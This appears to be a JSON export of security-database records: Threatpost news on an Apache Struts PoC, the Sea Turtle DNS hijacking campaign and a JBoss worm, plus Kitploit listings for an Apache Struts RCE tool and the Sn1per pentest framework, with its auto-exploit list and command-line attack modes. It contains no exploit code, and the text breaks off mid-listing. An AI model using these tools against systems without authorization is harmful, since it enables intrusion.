breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-24T11:42:41", "description": "A newly-discovered state-sponsored campaign is targeting national security organizations across the Middle East and North Africa (MENA) \u2013 and elsewhere \u2013 with domain name system (DNS) hijacking attacks, used to scoop up credentials.\n\nThe campaign, dubbed \u201cSea Turtle\u201d by the Cisco Talos researchers who discovered it, began as early as January 2017 and has continued through the first quarter of 2019.\n\nAt least 40 different organizations across 13 various countries have been compromised so far by the campaign; in addition to the MENA victims, secondary targets, including telecom firms, ISPs and DNS registrars are being targeted in the U.S. and Sweden.\n\nResearchers in a [Wednesday analysis](<https://blog.talosintelligence.com/2019/04/seaturtle.html>) said that the attackers behind the campaign have the capabilities and sophistication to grow: \u201cWhile this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system,\u201d they said.\n\n## The Campaign\n\nThe campaigns have been utilizing DNS hijacking attacks, a type of attack where an individual redirects traffic meant to go to a legitimate website to a malicious server \u2014 meaning that they could easily harvest website credentials and other sensitive data that users are sharing with web forms and the like.\n\nSince 2017, more than 40 firms have been compromised by the Sea Turtle attacks \u2013 including national security organizations, ministries of foreign affairs and prominent energy organizations; and telecom firms, internet service providers (ISPs) and DNS registrars. That includes companies like consulting firm [Cafax](<http://www.cafax.se/Home.html>) and DNS registry [NetNod,](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) which have both released public statements on the attacks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123213/image1.jpg>)\n\nIn addition to these types of targets, researchers said the campaign represents the first known case of a domain name registry organization that was compromised for cyber-espionage operations. A domain name registry manages different parts of the domain registry, such as country code top-level domains and generic top-level domains. Compromising a domain name registry allows attackers to access the DNS logs, and highlights the sophistication of the attackers, researchers said.\n\nThe campaign has been \u201chighly successful,\u201d researchers said, in part because the attacker employed DNS hijacking and redirection attacks to access targeted networks, as traditional security products aren\u2019t designed to monitor DNS requests, said researchers: \u201cThe threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought,\u201d researchers said.\n\n## The Attacks\n\nThe attackers gained initial access either through spear-phishing emails or through exploiting known flaws.\n\nThe phishing emails were aimed at registrants and used to gain their credentials. From there, the bad actors could access an organization\u2019s DNS records with the registrant\u2019s credentials.\n\nor by exploiting known vulnerabilities \u2013 including a PHP code injection flaw in phpMyAdmin (CVE-2009-1151), a remote code exploit for Cisco integrated service router 2811 (CVE-2017-6736) and the infamous \u201cDrupalgeddon\u201d remote code execution Drupal glitch (CVE-2018-7600).\n\nA list of impacted CVEs used by the attacker is below \u2013 but researchers say that they believe the list is incomplete and \u201cthe actor in question can leverage known vulnerabilities as they encounter a new threat surface.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123327/Screen-Shot-2019-04-17-at-12.03.19-PM.png>)\n\nOnce they gained access to a network, an attacker would access the DNS registry and modify the name system records for targeted firms, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries \u2013 allowing them to trick users to give them their credentials.\n\n\u201cThe amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days,\u201d researchers said. \u201cThis type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world.\u201d\n\nThe threat actors also used an array of techniques to evade detection, researchers said.\n\nFor instance, once users put their credentials into impersonated services, they would then be passed to the legitimate service, and couldn\u2019t tell that anything was wrong.\n\nAttackers also used an interesting technique called certificate impersonation, where attackers stole a certificate authority-signed X.509 certificate from another provider for the same domain, imitating the one already used by the targeted organization \u2013 making the web browser seem more legitimate.\n\n## Other Campaigns\n\nResearchers said that they assess with high confidence that the hijacking attacks are being launched by an advanced, state-sponsored actor looking to access sensitive networks and systems \u2013 but stayed mum on who exactly that actor was.\n\n\u201cThis is the first time Cisco Talos is documenting operations conducted by this threat actor,\u201d Craig Williams, director of Talos Outreach at Cisco, told Threatpost. \u201cWhile we assess with high confidence that this activity was carried out by an advanced, state-sponsored actor, we defer to law enforcement officials on establishing attribution.\u201d\n\nDNS-based attacks are an increasing worry for governments and enterprises alike.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123429/image3.png>)\n\nDNS Hijack Attack Vector\n\n[In January,](<https://threatpost.com/gov-warning-dns-hijacking/141088/>) the Department of Homeland Security is ordering all federal agencies to urgently audit DNS security for their domains in the next 10 business days.\n\nAlso [in January](<https://threatpost.com/unprecedented-dns-hijacking-attacks-linked-to-iran/140737/>), a wave of DNS hijacking attacks targeting victims in North America, Europe, Middle East and North Africa were linked to Iran. The attacks, which were related to a campaign dubbed \u201cDNSpionage\u201d by Cisco Talos researchers, had a high degree of success harvesting targets\u2019 credentials, according to the firm.\n\nHowever, Talos researchers said they assess with high confidence that the DNSpionage operations are \u201cdistinctly different and independent\u201d from the Sea Turtle campaign.\n\n\u201cThe report assesses with high confidence that Sea Turtle operations are distinctly different and independent from DNSpionage operations,\u201d Williams told Threatpost. \u201cDNSpionage and Sea Turtle have a strong correlation in that they both use the DNS hijacking/re-direction methodologies to perform their attacks. However, both campaigns\u2019 level of maturity and capability are distinctly different. Sea Turtle has a much more mature level of playbook by attacking their ancillary targets before shifting their focus to a specific set of Middle Eastern and African victims. Due to the closely related nature of the attacks, overlapping TTPs [tactics, techniques and procedures] are common, but our visibility makes it very clear these are two different groups.\u201d\n\nTo protect against these DNS hijacking attacks, Williams said that companies can implement a registry lock service, multi-factor authentication (to access DNS records), and of course staying up to date on patches, especially on internet-facing machines.\n\nHowever, \u201conce these credentials are stolen, it is virtually impossible to completely shut down a campaign until the credentials are regained, changed and locked,\u201d he told Threatpost.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "cvss3": {}, "published": "2019-04-17T17:32:06", "type": "threatpost", "title": "State-Sponsored DNS Hijacking Infiltrates 40 Firms Globally", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2017-6736", "CVE-2018-7600", "CVE-2020-1938"], "modified": "2019-04-17T17:32:06", "id": "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "href": "https://threatpost.com/dns-hijacking-campaign-40-firms-globally/143870/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:04:36", "description": "[](<https://threatpost.com/jboss-worm-exploiting-old-bug-infect-unpatched-servers-102111/>)There is a new worm circulating right now that is compromising servers running older versions of the JBoss Application Server and then adding them to a botnet. The worm also attempts to install a remote access tool in order to give the attacker control over the newly infected server.\n\nThe worm has been circulating for a couple of days at least, and it\u2019s not clear right now how many servers have been compromised or what the origins of it are. It apparently exploits an old vulnerability in the JBoss Application Server, which was patched in April 2010, in order to compromise new machines. Once that\u2019s accomplished, the worm begins a post-infection routine that includes a number of different steps.\n\nOne user who found the worm\u2019s payload on a honeypot machine he controls posted a message to Pastebin saying that the payload includes a variety of Perl scripts, one of which immediately connects a newly infected machine to an IRC server, effectively adding it to a botnet of other compromised JBoss servers. The payload also installs a RAT for future use by the attacker.\n\n\u201cI explored the contents of the malicious payload left and it contained Perl Scripts to automatically connect the compromised host to an IRC Server and be part of a BOTNET, install and run a remote access tool using dyndns (Flu.pl), and two Windows batch scripts, one is for exploring JBOSS Services (wstools.bat) and a script to discover all UDP\u2013based members running on a certain mcast addressJGroups called \u201cJGroups Cluster Discovery Script for Win32\u201d (probe.bat),\u201d the user wrote in his analysis of the [JBoss worm](<http://pastebin.com/U7fPMxet>). \n\nOfficials at Red Hat, which provides paid support for the open-source JBoss software, said that the vulnerability the worm exploits has been patched for more than a year and a half and users running outdated versions of the JBoss Application Server should patch their installations immediately.\n\n\u201cRed Hat has become aware of a worm currently affecting unpatched or unsecured servers running JBoss Application Server and products based on it. This worm propagates by connecting to unprotected JMX consoles, then uses the ability of the JMX console to execute arbitrary code in the context of the JBoss user,\u201d wrote [Mark Cox](<http://community.jboss.org/blogs/mjc/2011/10/20/statement-regarding-security-threat-to-jboss-application-server>), Red Hat\u2019s director of security response. \u201cThe worm affects users of JBoss Application Server who have not correctly secured their JMX consoles as well as users of older, unpatched versions of JBoss enterprise products. An update to JBoss enterprise products was produced in April 2010 to correct the flaw, [CVE-2010-0738](<https://access.redhat.com/kb/docs/DOC-30741>).\u201d\n\nThere are instructions for [securing the JMX console](<http://community.jboss.org/wiki/SecureTheJmxConsole.>) on the Red Hat site.\n", "cvss3": {}, "published": "2011-10-21T11:50:17", "type": "threatpost", "title": "JBoss Worm Exploiting Old Bug to Infect Unpatched Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0738"], "modified": "2013-04-17T16:33:32", "id": "THREATPOST:C31AD5F136E72DC9D06EECC9D1791450", "href": "https://threatpost.com/jboss-worm-exploiting-old-bug-infect-unpatched-servers-102111/75784/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "kitploit": [{"lastseen": "2023-12-04T15:31:19", "description": " \n\n\n[](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. \n \n**SHELL** \n**php** `finished` \n**jsp** `process` \n \n**CVE ADD** \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction'` \n**CVE-2017-5638** `Content-Type` \n**CVE-2018-11776** `'redirect:' and 'redirectAction'` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-05T20:49:44", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n \n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build Dockerfile\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-05T20:50:26", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port 